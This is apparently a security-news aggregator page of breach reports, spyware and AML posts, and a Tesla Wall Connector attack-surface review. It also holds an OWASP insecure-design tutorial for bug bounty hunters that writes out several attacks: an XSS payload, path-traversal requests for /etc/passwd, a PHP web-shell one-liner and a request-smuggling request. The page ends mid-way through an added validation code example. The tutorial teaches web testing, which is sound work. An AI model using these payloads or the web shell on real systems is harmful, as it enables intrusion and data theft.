Cencora stated that there was no evidence of the data being misused or disclosed publicly but implemented precautionary measures, including offering free identity protection services. The company worked with cybersecurity experts, law enforcement, and outside attorneys to secure systems and prevent further incidents. Affected individuals were encouraged to enroll in Experian IdentityWorks for credit monitoring and identity restoration services, free for 24 months.

10. NHS Confirms Patient Data Stolen in June Cyberattack

Image source: NHS

NHS England confirmed that patient data managed by Synnovis, a pathology testing organization, was stolen in a ransomware attack on June 3, 2024. The Russian cyber-criminal group Qilin leaked nearly 400GB of private data on the darknet, including patient names, NHS numbers, and test details. Over 3,000 appointments were disrupted by the attack, which also affected financial documents related to Synnovis and NHS trusts. The attackers encrypted Synnovis' systems and downloaded private data, demanding a ransom in Bitcoin. Qilin claimed responsibility, citing political motives related to the UK's foreign involvement.
Other Top Cyberattacks in 2024 That Shook the Horizon

EigenLayer lost $5.7 million in a cyberattack where attackers stole 1.6 million EIGEN tokens via a compromised email.

Ticketmaster's breach exposed 560 million customer records, including personal and credit card details. Hackers sold the data online, and affected users were warned to monitor their accounts.

A Chinese hacking group, "Salt Typhoon," stole data from eight US telecoms, compromising millions of customer records. The breach has been called the worst telecom hack in US history.

Microsoft detected a nation-state attack by Midnight Blizzard on January 12, 2024, compromising some corporate email accounts. No customer data was affected by the breach.

British auction house Christie's was forced to take its website offline following a cyber-attack, which also caused a delay in one of its live auctions.

In April 2024, the City of Helsinki discovered a data breach in its education division, affecting tens of thousands. Hackers exploited an unpatched vulnerability in a remote access server to gain unauthorized access to a network drive.

Ivanti patched critical zero-day vulnerabilities in its Cloud Service Appliance (CSA) after exploitation attempts. The flaws, affecting CSA versions 5.0.1 and earlier, allowed attackers to bypass restrictions and execute remote code. Ivanti released updates in CSA 5.0.2 and urged CSA 4.6 users to upgrade.

Summing Up!

The top cyberattacks of 2024, such as the theft of 110 million records from Change Healthcare, breaches impacting major corporations like Dell, and ransomware attacks disrupting essential services, have shown how vulnerabilities in both legacy and modern systems are being exploited.

With the dark web fueling the distribution of stolen data, cybercriminals are changing their methods and adopting new technologies to target victims.
To fight such adversaries, it is essential for organizations to adopt advanced security protocols, collaborate across sectors, and raise public awareness to protect sensitive information and infrastructure.

by The Cyber Express

Hackers are abusing legitimate Windows utilities to target Thai law enforcement with a novel malware that is a mix of sophistication and amateurishness.

by Dark Reading

Editor's note: The following blog post originally appeared on Levi Gundert's Substack page.

Introduction

A past conversation with an undercover federal agent who specializes in money laundering revealed staggering amounts of currency moving across geographic boundaries, skirting traditional Anti-Money Laundering (AML) processes. From local and transnational crime syndicates to presidential spouses and those looking to evade sanctions or tax regimes, the need to wash and move illicit funds into reputable banking channels has never been greater. The FT's recent AML coverage highlights the scale of the problem and provides timely background reading on money laundering networks, suspects, and indictments. One story is particularly relevant as it centers around proof-of-address compliance failures. Coincidentally, address verification is precisely the problem highlighted by a recent Recorded Future Payment Fraud Intelligence (PFI) report.

Big Fraud and a Hong Kong Address

The address in question is:

12th Floor, San Toi Building, 137-139 Connaught Road Central, Hong Kong

Image: The San Toi Building (and 12th-floor visual estimate), provided by Google Maps

The address is linked to two scam website (fraud) clusters, designated "Misspelled" and "Brand as a Cover", which share merchant accounts and payment processing logic. The three merchant accounts include CAMHUBSTORE, AQAPAY*xmvmxft, SMARTTECHHK, and gracefashionhub. Hundreds, if not thousands, of scam websites are connected to these merchants.

Image: A scam website snapshot. A victim articulates why Camhubstore is a scam site.

These merchant accounts, which process payments for fraudulent, non-existent goods, are tied to the 12th floor of the San Toi Building as the registered business address. The address is even placed directly on some of the sites as a contact address. Here's where it gets interesting. The address is listed on the U.S. Treasury OFAC list for ties to an Iranian terrorism group.
The 12th floor is presumably large enough to house multiple businesses and likely small enough that businesses transit through it reasonably often. Of course, it would be difficult to draw a direct connection between these merchant accounts and terrorism based on a shared-space address. Still, other questions remain, namely: how are these scam merchants acquiring the ability to process payment cards when their physical address is on the OFAC list?

Remedying AML / KYC Compliance Failures

Knowing your customer (KYC) might be difficult when bad actors go to great lengths to obscure their identity and purpose, but this is an egregious case of acquiring banks and payment processors missing obviously problematic contact details.

Geoff White's book, The Lazarus Heist, documented that even routine checks can lead to better outcomes. In it, White details North Korean hackers' inability to transfer a more significant amount (hundreds of millions of dollars) from Bangladesh Bank to a bank branch in Manila because the branch is located on Jupiter Street, and "Jupiter is also the name of a sanctioned Iranian shipping vessel." Addresses matter.

Suppose the US pursues a more friendly regulatory environment for cryptocurrencies under President Trump, and exchanges find it easier to acquire bank accounts. In that case, the potential for money laundering may explode without rigorous AML / KYC / KYT efforts. The SEC may have fewer teeth, but banks and processors are still gambling if anyone can obtain a merchant account with little to no compliance checks. Indeed, the business incentives are aligned to offer maximum merchant accounts to generate more processing fees, and historically, compliance costs have eroded profitability. However, this may be an emerging opportunity for GenAI.
Semi-autonomous agents trained to flag basic AML violations (for example, website contact details listed on OFAC) and elastic agents that deploy on demand when a new merchant application is submitted would assist AML compliance efforts and help a financial services industry that is grappling with a tsunami of fraudulent merchant transactions.
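The routine address check the post argues for, as an added example that is not Recorded Future's code: it normalises a merchant's free-text contact address (abbreviations, ordinals, punctuation, spacing) and flags it when it matches a sanctioned address or contains a sanctioned entity or vessel name. The sanctions list is constructed for the example, using the San Toi Building address named in the post and the "Jupiter" name from the Lazarus Heist anecdote; a real check would load current OFAC data.

```python
"""Merchant-onboarding address screening (illustrative, not Recorded Future's code).
The sanctions data below is constructed for the example; a real deployment would
load the current OFAC SDN list instead."""
import re
import unicodedata

# Abbreviations folded to one canonical token (constructed, not exhaustive).
_ABBREV = {
    "rd": "road", "st": "street", "ave": "avenue", "bldg": "building",
    "fl": "floor", "f": "floor", "ctr": "central", "hk": "hongkong",
}
_ORDINAL = re.compile(r"\b(\d+)(st|nd|rd|th)\b")   # "12th" -> "12"
_RANGE = re.compile(r"(\d+)\s*-\s*(\d+)")           # "137 - 139" -> "137-139"

# Constructed sanctions list: the address named in the post, and a vessel name
# (the "Jupiter" example from The Lazarus Heist) as a keyword to screen for.
SANCTIONED_ADDRESSES = [
    "12th Floor, San Toi Building, 137-139 Connaught Road Central, Hong Kong",
]
SANCTIONED_NAMES = {"jupiter"}


def normalise(address):
    """Return comparable tokens: ASCII-folded, lower-case, punctuation removed,
    ordinal suffixes stripped, abbreviations expanded, 'hong kong' joined."""
    text = unicodedata.normalize("NFKD", address).encode("ascii", "ignore").decode()
    text = _ORDINAL.sub(r"\1", text.lower())
    text = _RANGE.sub(r"\1-\2", text)
    text = re.sub(r"[^\w\s-]", " ", text)           # drop commas, slashes, dots
    tokens = [_ABBREV.get(t, t) for t in text.split()]
    return " ".join(tokens).replace("hong kong", "hongkong").split()


def screen_address(address, sanctioned=SANCTIONED_ADDRESSES,
                   names=SANCTIONED_NAMES, threshold=0.8):
    """Flag an applicant address when its tokens cover at least `threshold` of a
    sanctioned address's tokens, or when any token is a sanctioned name.
    Returns a dict for a compliance queue; each hit is (kind, match, score)."""
    tokens = normalise(address)
    token_set = set(tokens)
    hits = []
    for entry in sanctioned:
        entry_set = set(normalise(entry))
        coverage = len(entry_set & token_set) / len(entry_set)
        if coverage >= threshold:
            hits.append(("address_match", entry, round(coverage, 2)))
    for tok in tokens:
        if tok in names:
            hits.append(("name_keyword", tok, 1.0))
    return {"address": address, "flagged": bool(hits), "hits": hits}


if __name__ == "__main__":
    # Constructed merchant applications: abbreviated variants must still match.
    for applicant in (
        "12/F San Toi Bldg, 137-139 Connaught Rd Central, Hong Kong",
        "5 Jupiter Street, Makati, Manila",
        "Unit 4, 22 Example Street, Sydney",
    ):
        print(screen_address(applicant))
```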

by Recorded Future

OWASP has issued a new guide specifically for addressing and mitigating deepfake security risks by applying fundamental security principles.

by Barracuda

Using real-world examples and offering plenty of pragmatic tips, learn how to protect your directory services from LDAP-based attacks. The post LDAP Enumeration: Unveiling the Double-Edged Sword of Active Directory appeared first on Unit 42.

by Palo Alto Networks - Unit42

A new social engineering campaign has leveraged Microsoft Teams as a way to facilitate the deployment of a known malware called DarkGate. "An attacker used social engineering via a Microsoft Teams call to impersonate a user's client and gain remote access to their system," Trend Micro researchers Catherine Loveria, Jovit Samaniego, and Gabriel Nicoleta said. "The attacker failed to install a

by The Hacker News

Texas Tech University reports a data breach affecting 1.4 million, exposing personal, health, and financial data from its health sciences centers. Texas Tech University disclosed a data breach that impacted over 1.4 million individuals following a cyber attack. The security breach exposed the personal, health, and financial data from its health sciences centers, the Health […]

by Security Affairs

In February 2024, Serbian journalist Slaviša Milanov was taken to a police station following what seemed like a routine traffic stop. But after his release, the phone that he’d been asked to leave with police station reception staff was behaving oddly, and data and Wi-Fi settings were turned off, possible signs of hacking. Milanov contacted Amnesty International’s Security Lab about the incident, which led to several remarkable discoveries: A commercial forensic tool widely used by police and intelligence forces around the world had been misused to plant previously unknown Android spyware on Milanov’s phone, using Qualcomm zero-day vulnerabilities, all without due process. The Amnesty investigation deepened from there to find at least three additional cases, and evidence for potentially “dozens, if not hundreds” more. The findings, detailed in a new report from Amnesty, shed light on how Serbia spies on its own citizens, with help from Israel-based Cellebrite that Amnesty says violates international law and the product’s terms of use. “Our investigation reveals how Serbian authorities have deployed surveillance technology and digital repression tactics as instruments of wider state control and repression directed against civil society,” Dinushika Dissanayake, Amnesty International’s Deputy Regional Director for Europe, said in a statement. 
“It also highlights how Cellebrite mobile forensic products – used widely by police and intelligence services worldwide – can pose an enormous risk to those advocating for human rights, the environment and freedom of speech, when used outside of strict legal control and oversight.”

Cellebrite Abused to Install New 'NoviSpy' Android Spyware

Amnesty Security Lab identified a previously unknown spyware tool called “NoviSpy,” which, while less powerful than better known tools like NSO Group’s Pegasus spyware, can nonetheless “capture sensitive personal data from a target phone and provide capabilities to turn on a phone’s microphone or camera remotely.” Cellebrite forensic tools “are used to both unlock the phone prior to spyware infection and also allow the extraction of the data on a device,” Amnesty charged, adding that Cellebrite is investigating those claims.

“In at least two cases, Cellebrite UFED exploits (software that takes advantage of a bug or vulnerability) were used to bypass Android device security mechanisms, allowing the authorities to covertly install the NoviSpy spyware during police interviews,” Amnesty said. “Our forensic evidence proves that the NoviSpy spyware was installed while the Serbian police had possession of Slaviša’s device, and the infection was dependent on the use of an advanced tool like Cellebrite UFED capable of unlocking the device,” stated Donncha Ó Cearbhaill, the Head of Amnesty International’s Security Lab.

A second case in Amnesty’s 87-page report involved an environmental activist, Nikola Ristić, with “similar forensic evidence of Cellebrite products used to unlock a device to enable subsequent NoviSpy infection.” The report also details the history of use or procurement of spyware by Serbian authorities from Finfisher, NSO Group, and Intellexa over the last decade.
Qualcomm Vulnerabilities Exploited for Android Spyware

Amnesty worked with Google’s Threat Analysis Group (TAG) on the investigation, which detailed its findings in a separate technical blog. Among the findings were a zero-day Android use-after-free vulnerability (CVE-2024-43047) used in Cellebrite UFED that was “patched in the course of this research,” and the discovery of five additional Qualcomm vulnerabilities that were likely exploited in an attack chain. Two of the vulnerabilities (CVE-2024-49848 and CVE-2024-21455) were not fixed by Qualcomm within the industry-standard 90-day deadline, Google said, and CVE-2024-49848 remains unpatched 145 days after it was reported.

Zero-Click Attack Used to Install Android Spyware

Amnesty speculated that a zero-click attack may have been used in some cases, targeting Voice-over-Wi-Fi or Voice-over-LTE (VoLTE) functionality used in Android devices for Rich Communication Suite (RCS) calling. The report included a screenshot (republished below) of random, invalid numbers sent to one victim, after which the phone’s battery began to drain quickly.

Image: Possible zero-click attack leading to NoviSpy infection

by The Cyber Express

The cyberattack impacts at least 1.4 million patients, as tranches of highly sensitive personal, medical, and financial data fall into the hands of cyber crooks who have everything they need to carry out convincing social engineering and fraud attacks.

by Dark Reading

A new phishing campaign has been observed employing tax-themed lures to deliver a stealthy backdoor payload as part of attacks targeting Pakistan. Cybersecurity company Securonix, which is tracking the activity under the name FLUX#CONSOLE, said it likely starts with a phishing email link or attachment, although it said it couldn't obtain the original email used to launch the attack. "One of the

by The Hacker News

Actions direct agencies to deploy specific security configurations to reduce cyber-risk.

by Dark Reading

This post first appeared on blog.netwrix.com and was written by David Metzgar. OAuth is an authorization protocol that grants third-party websites or applications limited access to a user’s information (like their email or photos) — without sharing their logon credentials. For example, suppose you want to sign up for an app to help you track your fitness goals. Through the power of OAuth, you may have the … Continued

by Netwrix

This post first appeared on blog.netwrix.com and was written by James Anderson. Managing change for in-house applications and platforms is crucial for maintaining stability, security, and accountability. Unlike managing changes at the device level, working with applications requires a more comprehensive strategy. Let’s break it down. Why Change Control Matters: Imagine trying to manage an application that spans multiple environments, each with its unique configurations. Things can … Continued

by Netwrix

This post first appeared on blog.netwrix.com and was written by Dirk Schrader. Introduction to Cyber Attacks: Understanding the Global Threat. Cyber attacks are deliberate attempts to steal, alter, or destroy data or to disrupt operations and to damage the digital parts of a critical infrastructure. This blog post explores the most destructive major cyber attacks in history, detailing the underlying motives and impact, and then offers prevention … Continued

by Netwrix

Even the best companies with the most advanced tools can still get hacked. It’s a frustrating reality: you’ve invested in the right solutions, trained your team, and strengthened your defenses. But breaches still happen. So, what’s going wrong? The truth is that attackers are constantly finding new ways to slip through cracks that often go unnoticed—even in well-prepared organizations. The good

by The Hacker News

The Tesla Wall Connector is a Level 2 electric vehicle charge station designed for residential home users. The device has a minimal user interface in its hardware, providing a Wi-Fi based interface for configuration and an NFC reader for user authentication. The device does not come with a dedicated mobile application out of the box; the initial configuration, which is rather minimal, is performed via the web interface. After that, the device suggests using the Tesla One app for further configuration. The Tesla app allows connecting to the device but apparently can only be used to perform a few functions such as scheduled charging and viewing information about the device. It does not offer options for further configuration.

At the time of writing, the latest software version was reported as 24.36.3.

Hardware Analysis

Trend ZDI researchers have performed an analysis of the discrete hardware components found in the device. The device itself is comprised of several printed circuit boards (PCBs) hosting the system; the "main" PCB contains power and communications electronics, while the smaller flex core PCB carries the minimalistic human interface in the form of several LEDs and the NFC reader circuitry.

Below is a list of notable parts on the main PCB:

· U1 AD ADE7854AACPZ, a 3-phase energy measurement IC,
· U7 ST STM32L431RCT6, an ARM MCU with 256KB of Flash memory,
· U20 NXP 7102 3105, an unknown device, but likely to be an I2C secure element,
· U21 AzureWave AW-CU300, a WLAN module,
· U27 GigaDevice 25Q128E, a 128MB serial Flash.

On the board itself, about half of the area is occupied by the power electronics, with the low-current electronics concentrated on the left in this photo. Of most interest, the STM32 MCU is at the top left in Figure 1 (below) and the comms module is at the middle left.
The number of external connectors is kept at a minimum, with J3 in the middle providing connection for non-power signals in the charging cable.

Figure 1 - Tesla Wall Connector main PCB top

The bottom side of this board carries a variety of small components and the energy-metering IC. The green connector on the bottom left has an unknown purpose.

Figure 2 - Tesla Wall Connector main PCB bottom

Notably, many signals appear to be broken out on unpopulated pin headers. Once the varnish is removed, connecting to any MCU pin should be easy.

There are multiple unpopulated footprints on the top side of the board. Of these, J1 and J7 immediately stand out. Trend ZDI researchers have determined that J1 is wired to the STM32 MCU and has a standard ARM JTAG/SWD 10-pin connector pinout. Dealing with J7 was considerably more complicated, but it seems reasonable to assume a similar, if not identical, pinout.

Unfortunately, rather little information was found regarding the communications module used in this device. It appears to be produced by AzureWave Technologies, Inc. On their website, the AW-CU300 modules are listed as carrying a MW320 SoC, which appears to reference the 88MW320, a SoC designed by Marvell and then acquired by NXP. In terms of software, however, the only mention made is that the module uses "Marvell Smart Connect". No downloads of binary images or sources are provided by AzureWave.

Trend ZDI researchers look forward to discussing with the contestants the role the U20 IC plays in the overall system security.

Firmware Extraction

Extracting the STM32 firmware proceeded without many obstacles. As the J1 connector pinout is known, simply connecting an ST-Link V2 dongle proved sufficient to dump the whole contents of the on-chip flash.

Extracting the firmware of the communication module, however, turned out to be more challenging.
After attempting multiple approaches, Trend ZDI researchers were unable to interact with the interface over the J7 connector to get any meaningful results; only once did the device return an IDCODE of all zeros in JTAG mode when using a pinout corresponding to the ARM 10-pin connector. The unavailability of JTAG seems to be consistent with documented behavior when the MW320 SoC is in its secured mode: in this case, the JTAG interface is expected to be disabled by default and will not be enabled by the boot ROM.

Figure 3 - Tesla Wall Connector, detail of low-power electronics; both debugging headers installed

Another avenue of attack would be extracting the contents of the GigaDevice serial flash device U26; after all, this is all the storage the communications module has available. The challenge here is two-fold: first, the Flash device is inconveniently positioned in a tight space between the module and the flat cable connector J6, posing considerable risk of damaging the connector while attempting to remove the Flash chip from the board; second, the Flash contents may be encrypted at rest with an unknown key, hindering further analysis. That said, Trend ZDI researchers found a way to dump the contents of this IC in-system.

Looking closely, all the signal pins of U26 are broken out through small vias and can be accessed on the bottom side; since those vias are not covered with solder mask, they probably double as test points. By soldering to these points, it is possible to build an "adapter" good enough to connect the chip to a flash programmer such as the TL866+. Here is how the vias correspond to the IC pins:

Figure 4 - Tesla Wall Connector, detail of the via connections

Pin 8, VDD, is not directly accessible here but can be tapped off the debugging connector. The only issue is that the communications module CPU is simultaneously executing code, driving all the signals.
This can be overcome by keeping the CPU in reset; experimentally, placing a 1 kΩ resistor between pins 3 and 10 of J7 achieved exactly that. As a bonus, this interface enables experimenting on the system without having to resolder the flash chip every time.

Firmware Analysis

The STM32 flash image is clearly partitioned into two parts, the bootloader and the application, with the latter starting at offset 0x5000. The extracted STM32 firmware was found to be completely stripped of any useful ASCII strings. This made it very challenging for Trend Micro researchers to identify any specific software components in use. What could be said, however, is that the MCU does not appear to be in charge of handling any internet-facing communications. It does seem to use some kind of RTOS, judging by the presence of what looked like thread names among the few strings the image had: wifirx, wifitx, wifireltx, cantx, canrx, metertrx, leds, and IDLE. Based on that, we conclude that the MCU mostly deals with CAN, metering, and LEDs, while the communications module handles the rest of the communications.

The communications module firmware is somewhat more involved, as code signing is supported and used. The image was inspected in a hex editor; the contents were not encrypted. The following interesting fragments were detected:

· 0x00000000: A secure boot header corresponding to what is described in the SoC documentation.
· 0x000002BA: A short code fragment, apparently a bootloader of sorts.
· 0x00004000: A short header marked with WMPT, which looks like a partition table for the rest of the flash.
· 0x00005000: A copy of the above.
· 0x00006000: The psm partition. This seems to contain some (encrypted?) configuration data.
· 0x00008000: The mcufw partition, storing the actual application firmware.
The format of this image has been investigated before by others.
· 0x00288000: The second mcufw partition.
· 0x00508000: The fs partition, which is littlefs-formatted. This appears to contain mostly log data.

As a side note, the mcufw image appears to include the full STM32 image inside; likely, the comms module can reprogram the STM32 MCU directly.

Network Traffic Analysis

The device provides its own Wi-Fi access point for configuration and management, with the SSID starting with TeslaWallConnector and the passphrase comprised of 12 upper-case letters. Once connected to this AP, it is possible to interact with the web-based interface and configure the unit to connect itself to an internet-facing Wi-Fi network. This allows the user to monitor the unit, and the unit to communicate with remote endpoints and update itself when a new software version becomes available.

A network scan was performed with nmap, which discovered TCP ports 80 and 34578 as well as UDP ports 67 and 5353 open on the device. This set of ports remained the same regardless of whether the device was configured to connect to a Wi-Fi access point or remained standalone; the same TCP ports were exposed on the client side when connected to the Wi-Fi AP. When connected, the device communicated with the following servers:

· hermes-prd.sn.tesla.services
· wc-maestro-prd.sn.tesla.services
· s3-us-west-2.amazonaws.com

Communications with the first two services were TLS-protected, and client and server certificates were requested and provided by both sides. The server certificates were issued by Tesla Energy Services CA, while the client certificate came from NXP Plug Trust CA. MitM attacks were not attempted by Trend Micro researchers at this point. The third endpoint, however, used plain HTTP. This allowed the researchers to snoop on the requested data, which turned out to be the software update bundle.
The bundle was found to be encrypted; a cursory search on the web did not reveal any hints on the algorithm or the key.Research on TCP port 34758 seems to indicate that this is an endpoint for load-sharing setup, requiring mutual TLS authentication before further access can be gained.SummaryWhile these may not be the only attack surfaces available on the Tesla Wall Connector unit, they represent the most likely avenues a threat actor may use to exploit the device. We’re excited to see what research is displayed in Tokyo during the Pwn2Own Automotive event. Stay tuned to the blog for attack surface reviews for other devices, and if you’re curious, you can see all the devices included in the contest. Until then, you can find me on Mastodon at @infosecdj, and follow the team on Twitter, Mastodon, LinkedIn, or Bluesky for the latest in exploit techniques and security patches.

by Zero Day Initiative Blog

by ComputerWeekly

A suspected South Asian cyber espionage threat group known as Bitter targeted a Turkish defense sector organization in November 2024 to deliver two C++-malware families tracked as WmRAT and MiyaRAT. "The attack chain used alternate data streams in a RAR archive to deliver a shortcut (LNK) file that created a scheduled task on the target machine to pull down further payloads," Proofpoint

by The Hacker News

The CL0P ransomware gang has claimed responsibility for attacks exploiting a vulnerability in Cleo file sharing products.

by ThreatDown

In a previously unreported August memo, the Department of Homeland Security urged state and local police to conduct exercises to test their ability to respond to weaponized drones.

by WIRED Security News

An online repository of screenshots where victims filled out their payment card details online was publicly accessible.

by Malwarebytes Labs

Addressing cyber threats before they have a chance to strike or inflict serious damage is by far the best security approach any company can embrace. Achieving this takes a lot of research and proactive threat hunting. The problem here is that it is easy to get stuck in endless arrays of data and end up with no relevant intel.  To avoid this, use these five battle-tested techniques that are

by The Hacker News

Three vulnerabilities in the service's Apache Airflow integration could have allowed attackers to take shadow administrative control over an enterprise cloud infrastructure, gain access to and exfiltrate data, and deploy malware.

by Dark Reading

The FBI warned of a fresh wave of HiatusRAT malware attacks targeting internet-facing Chinese-branded web cameras and DVRs. The Federal Bureau of Investigation (FBI) released a Private Industry Notification (PIN) to warn of HiatusRAT malware campaigns targeting Chinese-branded web cameras and DVRs. The report includes a set of recommendations to mitigate the exposure to the […]

by Security Affairs

Program designed to validate and sharpen cybersecurity skills for working professionals.

by Dark Reading

The Irish Data Protection Commission (DPC) has announced its final decision in two inquiries into Meta Platforms Ireland Limited (MPIL), levying a combined €251 million in fines for GDPR violations related to a 2018 Facebook data breach. The incident, which compromised sensitive user information, arose from the unauthorized exploitation of user tokens on the Facebook … The post Ireland Fines Meta €251 Million Over 2018 Facebook Data Breach appeared first on CyberInsider.

by Cyber Insider

Threat actors are using voice phishing (vishing) attacks via Microsoft Teams in an attempt to trick victims into installing the DarkGate malware, according to researchers at Trend Micro.

by KnowBe4

The U.S. Justice Department revealed indictments against 14 North Korean nationals for their involvement in a long-running scheme designed to pose as remote IT professionals.

by KnowBe4

Ransomware attacks targeting utilities have surged by 42% over the past year, with spear phishing playing a major role in 81% of cases, according to a ReliaQuest study spanning November 2023 to October 2024.

by KnowBe4

Getting inside the mind of a threat actor can help security pros understand how they operate and what they're looking for — in essence, what makes a soft target.

by Dark Reading

Bogus software update lures are being used by threat actors to deliver a new stealer malware called CoinLurker. "Written in Go, CoinLurker employs cutting-edge obfuscation and anti-analysis techniques, making it a highly effective tool in modern cyber attacks," Morphisec researcher Nadav Lorber said in a technical report published Monday. The attacks make use of fake update alerts that employ

by The Hacker News

Breaking Down the OWASP Top 10: Insecure Design
Andrew Pratt
Tue, 12/17/2024 - 11:16

In the absence of these considerations, systems can be retrofitted with ineffective security controls or lack them entirely. This can be attributed to teams rushing to meet a release deadline, or to teams that are unaware of the security threats they may encounter. This lack of threat modeling and adherence to best practices and principles is what we, as hackers, can capitalize on.

To understand what is considered an insecure design vulnerability, let's evaluate some of the Common Weakness Enumerations (CWEs) mapped to this classification. You can view the full list here.

CWE-602: Client-Side Enforcement of Server-Side Security

This design weakness arises when a server relies solely on client-side protections for enforcing security policies.

Many web applications implement input validation or sanitization to prevent malicious payloads from being processed by the server. These security measures also restrict the data end users are allowed to submit, such as rules governing the allowed data type, minimum/maximum length, format, or characters.

These protections often take place on the client side because it improves the speed of the checks and provides a better user experience; however, if user input is not also properly checked by the server, you can easily circumvent these defensive measures through the use of an HTTP proxy tool such as Caido. By intercepting a request after it is sent by the browser, you can bypass any client-side restrictions or checks, allowing you to modify the data being sent.

For example, consider a form that limits users to alphanumeric characters when supplying input to the fields. To accomplish this, the developers defined the following validation schema using the Zod library:

While this would block a payload such as <img src=x onerror=alert()> from being submitted, if the backend is not validating the data again, you could simply supply valid input initially and then change the value in an intercepted request:

    POST /comment HTTP/1.1
    Host: example.com

    comment=%3Cimg%20src%3Dx%20onerror%3Dalert()%3E

Similarly, if sanitization is being used to remove data containing script tags but is only performed in the frontend, you could bypass this check by embedding the tag within another:

    <scr<script>ipt>alert()</scr<script>ipt>

As you can see, this vulnerability would allow you to send arbitrary data that will be handled by the backend – a design choice that was not intended. While this may be sufficient for a normal user, it would be inadequate against you as a bug bounty hunter.

CWE-73: External Control of File Name or Path

When parameters that specify files are exposed without the proper restrictions in place, you may be able to access, modify, or execute arbitrary files. This can be especially impactful when access to files and directories outside of the web root is possible, as these directories contain sensitive system files.

For example, if an application selects an image file to use as the banner of a webpage, you could use directory traversal techniques to access other files:

    GET /image?filename=../../../etc/passwd

Even if security checks are implemented, such as ensuring that the filename ends in an image extension, it may be possible to terminate the file path by using a null byte:

    GET /image?filename=../../../etc/passwd%00.jpg

If traversal sequences are being matched and removed, the same embedding technique mentioned earlier may bypass this sanitization:

    GET /image?filename=....//....//....//etc/passwd

If the web application offers file upload functionality, the presence of this insecure design capability can result in the ability to upload malicious files. For example, if a server was using PHP as its backend language, you could potentially achieve remote code execution by uploading your own PHP file with the following script:

    <?php echo system($_GET['command']); ?>

By navigating to the uploaded file's location and supplying the command parameter, you could run system commands on the server:

    GET /uploads/command.php?command=whoami

CWE-444: Inconsistent Interpretation of HTTP Requests

Certain insecure design vulnerabilities in a system's architecture can be exploited via HTTP request smuggling attacks.

For web applications that are not well known and thus receive low levels of traffic, a single server is most likely sufficient to handle all the incoming requests. However, popular applications can receive levels of traffic that would overwhelm a single server – resulting in latency issues or outages. To mitigate against system downtime, network engineers may place servers (load balancers or reverse proxies) in front of backend servers to alleviate the workload. These frontend servers will intercept multiple requests, group them, and distribute the bundled requests in a way that ensures no one backend server is overwhelmed. Each request in this bundle will enter a processing queue.

To delineate these bundled requests, HTTP/1.1 utilizes two request headers to specify where one request ends and another begins: Content-Length and Transfer-Encoding.

The value of the Content-Length header represents the number of bytes in the body of a request. For example:

    POST /comment HTTP/1.1
    Host: example.com
    Content-Length: 28
    Content-Type: application/x-www-form-urlencoded

    comment=X&username=ninjeeter

If the value of the Transfer-Encoding header is set to chunked, the request body data is divided into one or more portions referred to as "chunks". Each chunk is also measured in bytes, but its size is written in hexadecimal. With this header, the end of a request is marked with a chunk size of 0. For example:

    POST /comment HTTP/1.1
    Host: example.com
    Transfer-Encoding: chunked
    Content-Type: application/x-www-form-urlencoded

    1c
    comment=X&username=ninjeeter
    0

The vulnerability arises when there is a mismatch between the frontend and backend server on which header is to be used. By sending a request with both headers, the frontend is tricked into thinking multiple requests are a single request. However, once the backend receives this "single" request, it processes each one separately.

For example, if the frontend server uses the value of the Content-Length header to determine the end of a request, but the backend uses Transfer-Encoding: chunked – you could potentially "smuggle" a request to a restricted endpoint with:

    POST /comment HTTP/1.1
    Host: example.com
    Cookie: session=123ABC
    Content-Length: 138
    Content-Type: application/x-www-form-urlencoded
    Transfer-Encoding: chunked

    0

    GET /admin/delete?name=otheruser HTTP/1.1
    Host: localhost
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 51

    x=

This request will be seen as one by the frontend but as two by the backend. When the backend gets to the GET /admin/delete?name=otheruser HTTP/1.1 request, it will be held in the processing queue awaiting the missing 49 bytes. The empty parameter x= will catch the subsequent request and take the first 49 bytes from it.

It is critical to note that the value of the Content-Length header includes the CRLF characters. Each \r and \n is considered to be one byte.

Here are some disclosed HTTP request smuggling reports that have been submitted by security researchers on the HackerOne platform:

- https://hackerone.com/reports/2032842
- https://hackerone.com/reports/726773
- https://hackerone.com/reports/1063627
- https://hackerone.com/reports/777651

CWE-840: Business Logic Errors

Business logic vulnerabilities allow malicious attackers to exploit an application's legitimate processing flow to achieve unintended results. These issues arise from unforeseen user behavior and design choices based on assumptions made by developers that do not account for edge cases.

In processing flows that are multistep, developers may not envision scenarios in which certain parameters are removed, reused, or modified. These parameters can be critical to the proper outcome of an operation. Data flows that should be tested for business logic vulnerabilities include:

- Password reset functionality
- Authentication flows
- Updating account information
- E-commerce purchase flows
- Applying discount codes

Certain crucial parameters may even be inherently insecure as their values are widely known. For example, if developers require a security question to be answered before allowing a password reset, but the question is too general, such as "What city did you grow up in?" – you could simply use this wordlist to brute force the correct answer.

Since these vulnerabilities arise in the specific context of the functionality a web application offers, these insecure design weaknesses can go undetected without in-depth code review. When you are navigating an application, make sure you become familiar with the intended flow of user actions; then you can brainstorm how the process can be exploited.

Conclusion

Insecure design vulnerabilities are often tied to the specific technologies powering an application. Because of this, it is crucial to first identify and understand the technologies in use before looking for potential weaknesses. This can be accomplished by using tools such as WhatRuns or Wappalyzer. It is also important to gain a deep understanding of how the application operates, so invest ample time into a single target. Ultimately, securing an application from the ground up requires careful attention to detail, and any oversight can result in a bounty payout for you.
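Server-side counterparts to the client-side checks under CWE-602 and the file-name handling under CWE-73 above, as an added example that is not part of the HackerOne post: the /comment handler re-validates the percent-decoded body against the same alphanumeric allow-list the browser form used, and the image handler canonicalises the requested name before checking that it still lies under the web root. The function names, the /var/www root and the sample inputs are assumptions made for this example.

```javascript
// Added example (not from the HackerOne post): server-side counterparts to the
// client-side checks discussed under CWE-602 and the file-name handling under
// CWE-73. Function names, the /var/www web root and all sample inputs are
// assumptions made for illustration.
const path = require("path");

// ---- CWE-602: the server validates on its own, whatever the browser did ----

// The same allow-list the client form enforces (alphanumeric, bounded length).
// Rejecting rather than "cleaning" means a request that skipped the browser
// check is simply refused.
function validateComment(comment) {
  if (typeof comment !== "string") return { ok: false, reason: "not a string" };
  if (comment.length < 1 || comment.length > 280) return { ok: false, reason: "bad length" };
  if (!/^[A-Za-z0-9]+$/.test(comment)) return { ok: false, reason: "non-alphanumeric" };
  return { ok: true, value: comment };
}

// Minimal application/x-www-form-urlencoded decoder, so the check runs on what
// the client actually sent after percent-decoding (the %3Cimg... body above
// decodes to a literal <img> tag and is rejected by validateComment).
function parseFormBody(body) {
  const fields = {};
  for (const pair of body.split("&")) {
    if (pair === "") continue;
    const eq = pair.indexOf("=");
    const key = eq < 0 ? pair : pair.slice(0, eq);
    const val = eq < 0 ? "" : pair.slice(eq + 1);
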